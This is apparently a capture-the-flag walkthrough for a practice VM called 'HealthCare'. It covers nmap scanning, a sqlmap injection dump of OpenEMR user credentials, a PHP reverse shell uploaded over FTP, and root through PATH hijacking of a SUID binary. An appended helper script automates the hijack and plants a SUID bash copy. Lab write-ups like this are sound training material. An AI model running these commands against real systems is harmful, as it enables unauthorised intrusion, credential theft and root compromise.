HealthCare

Nmap

21/tcp open  ftp     ProFTPD 1.3.3d
80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
| http-robots.txt: 8 disallowed entries 
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/ 
|_/all_our_e-mail_addresses /admin/ /
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
|_http-title: Coming Soon 2
MAC Address: 08:00:27:12:B9:5A (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Enumeration

Gobuster

found /openemr/ (an OpenEMR install) // its login page is vulnerable to SQL injection

Exploitation

sqlmap -u "http://10.0.2.37/openemr/interface/login/validateUser.php?u=admin" -D openemr -T users --dump

The dumped users table gave these credentials (user : password), which also worked for FTP:

medical : medical 
ackbar : admin 

uploaded a PHP reverse shell over FTP into the var/www/ directory (served by Apache)

requested it and got a reverse shell

Privilege Escalation

Among the SUID binaries, /usr/bin/healthcheck executes fdisk and ifconfig by bare name (no absolute path).

Since we control PATH, we can put our own ifconfig ahead of the real one.

The program is vulnerable because it runs as root (SUID) and resolves fdisk and ifconfig through PATH, which we control, so whatever we place under one of those names runs as root. To get root, create a script named ifconfig in /tmp, put /tmp first in PATH, and run /usr/bin/healthcheck so it executes our script instead of the real ifconfig. The simplest payload just runs /bin/bash; if the spawned shell drops its effective uid back to ours (bash does this unless started with -p), have the script set the SUID bit on /bin/bash instead (chmod u+s /bin/bash) and then run bash -p.

cd /tmp 

echo "/bin/bash" > ifconfig

chmod +x ifconfig

export PATH=/tmp:$PATH

/usr/bin/healthcheck

// got root access
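The PATH-hijack steps above, as an added shell example that is not part of the original write-up: one function picks out which of a list of candidate commands a binary invokes by bare name, one builds the hijack directory, and one prints the trigger command. SAMPLE_STRINGS is constructed to stand in for `strings /usr/bin/healthcheck` output (the real strings are not on the page), and the payload uses a SUID copy of bash in /tmp rather than spawning bash directly.

```shell
#!/bin/sh
# Added example (not the write-up's own code): helpers for PATH-hijacking a
# SUID binary that calls commands by bare name, as /usr/bin/healthcheck does.
# SAMPLE_STRINGS is a constructed stand-in for `strings` output (assumption).
SAMPLE_STRINGS='/lib/ld-linux.so.2
libc.so.6
system
setuid
fdisk -l
ifconfig
/sbin/route -n
df -h
GLIBC_2.0'

# Given `strings` output and candidate command names, print each candidate
# the binary invokes by bare name, i.e. a string that starts with the name
# itself rather than an absolute path. "/sbin/route -n" is not hijackable
# through PATH; "fdisk -l" and "ifconfig" are.
hijackable_commands() {
  strings_out=$1
  shift
  for cmd in "$@"; do
    if printf '%s\n' "$strings_out" | grep -Eq '^'"$cmd"'( |$)'; then
      printf '%s\n' "$cmd"
    fi
  done
}

# Create DIR/<name> for each hijackable name. When the SUID target resolves
# the name via PATH, the wrapper runs with euid 0 and drops a SUID copy of
# bash in /tmp. Exec'ing /bin/bash directly is fragile: bash resets euid to
# the real uid unless started with -p.
build_hijack_dir() {
  dir=$1
  shift
  mkdir -p "$dir"
  for cmd in "$@"; do
    cat > "$dir/$cmd" <<'EOF'
#!/bin/sh
# Runs as root when the SUID binary picks us up through PATH.
cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash
EOF
    chmod 755 "$dir/$cmd"
  done
  printf '%s\n' "$dir"
}

# Print (rather than run) the command that triggers the hijack for a target,
# so it can be reviewed before use.
hijack_command() {
  printf 'PATH=%s:$PATH %s && /tmp/rootbash -p\n' "$1" "$2"
}

# Usage on the box (not executed here):
#   hijackable_commands "$(strings /usr/bin/healthcheck)" fdisk ifconfig
#   d=$(build_hijack_dir /tmp/hijack fdisk ifconfig)
#   sh -c "$(hijack_command "$d" /usr/bin/healthcheck)"
```

Setting the SUID bit on /bin/bash itself, as the paragraph above suggests, also works, but it modifies a system binary; the copy in /tmp leaves /bin/bash untouched and is easy to remove afterwards. Whichever payload is used, both hijacked names (fdisk and ifconfig) should be planted, since either one being resolved first is enough.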